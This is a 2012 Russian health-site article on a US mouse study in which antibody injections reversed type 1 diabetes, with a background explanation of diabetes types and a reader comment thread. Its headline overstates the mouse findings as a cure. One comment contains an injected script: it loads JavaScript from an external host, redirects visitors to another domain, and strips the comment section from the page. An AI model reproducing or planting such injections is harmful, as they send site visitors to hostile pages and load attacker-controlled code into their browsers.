Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Всего две инъекции антите...  >>  Всего две инъекции антител вылечат сахарный диабет!
 
Обратная связь
 

Всего две инъекции антител вылечат сахарный диабет!

Размер шрифта
14 августа 2012 00:00
Юрий Малышев
Здоровье инфо
Анна Белевская
Здоровье инфо
  • google_analytics: false
  • Нравится

Американские ученые нашли новый способ лечения сахарного диабета с помощью антител и провели успешные испытания на мышах.

диабет

Что такое сахарный диабет

Сахарный диабет – это заболевание, при котором наблюдается стойкое повышение уровня глюкозы в крови. Выделяют сахарный диабет 1 и 2 типа.

При сахарном диабете 1 типа происходит нарушение работы иммунной системы и Т-лимфоциты разрушают клетки поджелудочной железы, в которых образуется инсулин. Инсулин необходим нашему организму для снижения уровня глюкозы в крови. Оставшиеся клетки поджелудочной железы не могут удовлетворить потребности организма в инсулине, поэтому большая часть глюкозы не поступает в клетки, а остается в крови.

При сахарном диабете 2 типа клетки поджелудочной железы не страдают, и в организме находится достаточное количество инсулина. Однако клетки теряют чувствительность к инсулину – развивается так называемая инсулинорезистентность. Если представить, что инсулин – это ключик, который открывает клетку для глюкозы, то при инсулинорезистентности ключик не подходит к замку и не может открыть клетку. В результате глюкоза не поступает в клетки и остается в крови.

Лечение

Пациенты с сахарным диабетом 1 типа должны ежедневно получать инъекции инсулина. Лечение пациентов с сахарным диабетом 2 типа начинается с немедикаментозных мероприятий: соблюдения диеты, снижения веса и увеличения физической активности. В дальнейшем используются сахароснижающие препараты, и только при истощении клеток поджелудочной железы – инсулин.

Суть исследования

Исследование проводилось на мышах, у которых был смоделирован сахарный диабет 1 типа. Для лечения заболевания американские ученые использовали специальные антитела. Они связываются с особыми белками, которые находятся на поверхности Т-лимфоцитов, но не разрушают клетки, поэтому общее количество Т-лимфоцитов не меняется.

У некоторых мышей уровень сахара в крови вернулся к нормальным значениям уже через 48 ч после введения антител, а через 5 дней сахарный диабет удалось вылечить у 80% животных. Несмотря на то, что антитела выводятся из организма животных за 2-3 недели, лечебный эффект сохраняется в течение длительного времени. Ученые наблюдали за животными в течение 400 дней после двух инъекций антител: у большинства животных симптомы сахарного диабета отсутствовали.

Результаты

Полученные результаты свидетельствуют о том, что на ранних стадиях заболевания антитела позволяют остановить разрушение клеток поджелудочной железы, которые вырабатывают инсулин. Интересен тот факт, что антитела избирательно воздействуют только на те Т-лимфоциты, которые атакуют клетки поджелудочной железы, тогда как в других тканях и в крови количество Т-лимфоцитов не меняется. В настоящее время ученые работают над созданием антител, которые можно будет использовать у человека.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

25 августа 2012 в 20:34

Цитировать   |   Пожаловаться

Здравствуйте! Скажите на какой стадии находится данный эксперимент? были ли экспериманты на человеке? Возможно ли лечение диабета 1 типа в настоящее время или каким образом можно поддержать функцию собственной выработки инсулина, если диагноз диабета 1 типа нам только определили? Благодарны за любую информацию. Татьяна.  (zozutan@mail.ru)

Гость 25 августа 2012 в 20:34
Скажите на какой стадии находится данный эксперимент? были ли экспериманты на человеке?
 Эксперимент - на стадии исследований на мышах. Данные из медицинских источников США. 
Ваш вопрос Вам стоит обсудить с хорошим эндокринологом. С обсуждением Ваших показателей анализов, функций разных систем. Попробуйте найти такого специалиста. 
Если решите обследоваться в Москве, то здесь http://www.zdorovieinfo.ru/anketa_patsienta/ Вам следует заполнить короткую анкету, дождаться звонка специалиста, по телефону обсудите клинику и врача.  


Если 

3 - Гость

07 июля 2013 в 19:59

Комментарий удален за нарушение Правил общения

4 - Гость

06 января 2015 в 18:58

Цитировать   |   Пожаловаться

Здравствуйте! Я диабет 2 типа сахар у меня вечером 14. днем 22 по разному. Лечение: Амарил в день 1 мг. Сиофор 850 один раз вдень пью. Можно ли вылечить меня. Дайте координаты специалиста пожалуйста. Цена лечения какая. Это инъекция уже безопасно ли и когда она будет доступна для приобретения. Заранее благадарю. 

5 - zzzzzz

30 июня 2015 в 23:37

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Косметика вызывает диабет   Факторы риска сахарного диабета 2 типа   Что влияет на показатели сахара?   Высокий сахар в крови приводит к старческому слабоумию  
28 августа 2012Если вы лечите диабет – будете умнее! 04 сентября 2012Косметика вызывает диабет!
 
13 августа 2012Всего две инъекции антител вылечат сахарный диабет! 09 апреля 2013Знаете ли вы ваш уровень сахара
 

Слайдшоу

1
Сахар – это наркотик?
Лучшая и худшая еда для диабета. Часть 2
Как побороть зависимость от сахара

Тесты

1
Оцените риск развития сахарного диабета
Что вы знаете о поджелудочной железе?
Есть ли у вас скрытый риск диабета?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.